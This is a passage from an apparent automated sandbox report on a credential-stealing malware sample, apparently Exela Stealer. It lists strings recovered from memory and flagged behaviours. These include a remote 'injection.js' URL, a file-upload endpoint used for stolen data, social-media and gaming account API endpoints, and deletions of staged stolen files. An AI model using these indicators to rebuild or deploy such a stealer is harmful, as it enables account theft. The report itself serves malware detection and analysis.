            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2144659393.0000018B479A0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429561498.0000018B4799B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2437909240.0000018B479B6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B4798E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434391488.0000018B4799C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434277600.0000018B4799B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444100879.0000018B479B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
            Source: powershell.exe, 00000051.00000002.2334646014.00000260D11EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000051.00000002.2334646014.00000260D1331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000051.00000002.2305154049.00000260C2AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oauth.reddit.com/api/v1/me
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oauth.reddit.com/api/v1/mep
            Source: powershell.exe, 00000051.00000002.2305154049.00000260C28E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000051.00000002.2305154049.00000260C28E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://open.spotify.com/user/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://peps.python.org/pep-0649/)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://peps.python.org/pep-0749/)-implementing
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://pypi.org/project/attrs/)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://pypi.org/project/cryptography/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2454057077.00007FFD943CE000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://python.org/dev/peps/pep-0263/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/justforExela/injection/main/injection.js
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/justforExela/injection/main/injection.js0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svg
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://stackoverflow.com/questions/tagged/python-attrs)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store1.gofile.io/uploadFile
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447278741.0000018B49DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/custom
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444712748.0000018B47CB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B48260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/ExelaStealer
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/ExelaStealer----------------------
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/ExelaStealer0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2417097978.0000018B495CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.m~
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://thumbnails.roblox.com/v1/users/avatar?userIds=
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek).
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/home
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/i/api/1.1/account/update_profile.json
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/i/api/1.1/account/update_profile.jsonP
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444818506.0000018B47DC0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&ap
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122665167.000002BD86724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122665167.000002BD86731000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122726494.000002BD86731000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122665167.000002BD86724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
            Source: METADATA.0.drString found in binary or memory: https://www.attrs.org/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/FilePreviews.svg
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Klaviyo.svg
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Tidelift.svg
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Variomedia.svg
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/latest/names.html)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/stable/changelog.html
            Source: METADATA.0.drString found in binary or memory: https://www.attrs.org/en/stable/changelog.html)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/stable/comparison.html#customization)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/stable/why.html#data-classes)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86730000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447278741.0000018B49DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.b
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B48260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444818506.0000018B47DC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457245244.00007FFDA3472000.00000004.00000001.01000000.00000011.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.openssl.org/H
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2144659393.0000018B479A0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429561498.0000018B4799B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2437909240.0000018B479B6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B4798E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434391488.0000018B4799C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434277600.0000018B4799B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444100879.0000018B479B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121997815.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442501130.0000018B474B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46E70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/user/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.roblox.com/my/account/json
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.spotify.com/api/account-settings/v1/profile
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434510034.0000018B47C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitch.tv/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.twitch.tv/0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.variomedia.de/
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Modifies existing user documents (likely ransomware behavior)
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\NEBFQQYWPS.xlsxJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\PWCCAWLGRE.jpgJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\ZQIXMVQGAH.xlsxJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\PIVFAGEAAV.pngJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\EFOYFBOLXA.pngJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B85C000_2_00007FF7B2B85C00
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B689E00_2_00007FF7B2B689E0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B869640_2_00007FF7B2B86964
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B610000_2_00007FF7B2B61000
